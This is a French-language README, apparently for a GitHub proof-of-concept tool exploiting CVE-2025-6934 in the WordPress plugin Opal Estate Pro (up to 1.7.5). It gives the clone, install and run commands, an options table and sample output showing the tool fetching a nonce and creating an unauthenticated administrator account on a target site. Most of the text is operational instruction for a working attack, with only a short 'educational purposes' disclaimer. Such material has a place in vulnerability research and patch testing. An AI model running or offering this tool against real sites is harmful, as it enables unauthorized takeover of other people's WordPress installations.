
Exploit PoC automatisé pour WordPress Opal Estate Pro qui détecte les versions vulnérables, récupère le nonce et crée des comptes administrateur non autorisés.
CVE-2025-6934 est un exploit de preuve de concept (PoC) ciblant le plugin WordPress : Opal Estate Pro ≤ 1.7.5.
Cet exploit démontre la création d'un compte administrateur sans authentification.
Avertissement : Ce PoC est uniquement destiné à des fins éducatives. Ne l'utilisez pas sur des systèmes sans autorisation.
git clone https://github.com/Rosemary1337/CVE-2025-6934.git
cd CVE-2025-6934
pip install -r requirements.txt
Prérequis :
requests,beautifulsoup4,colorama
python3 main.py -u <TARGET_URL> -mail <EMAIL> -password <PASSWORD> -user <USERNAME>
python3 main.py -u http://site.com/ -mail [email protected] -password 3xplo1tI5Fun -user r1337
| Option | Description | Requis | Défaut |
|---|---|---|---|
-u, --url | URL du site cible | Oui | - |
-mail, --newmail | E-mail du nouvel administrateur | Oui | - |
-password, --newpassword | Mot de passe du nouvel administrateur | Oui | - |
-user, --username | Nom d'utilisateur du nouvel administrateur | Non | administrator |
La console affiche :
[•][✔][✖][i]Exemple :
[•] Starting Exploit...
[✔] Nonce Found: xyz123
[✔] Exploit Successful!
Username : r1337
Email : [email protected]
Password : 3xplo1tI5Fun
Role : administrator
Je suis un développeur actif qui aime créer des outils et partager ses connaissances. Vous pouvez me joindre via :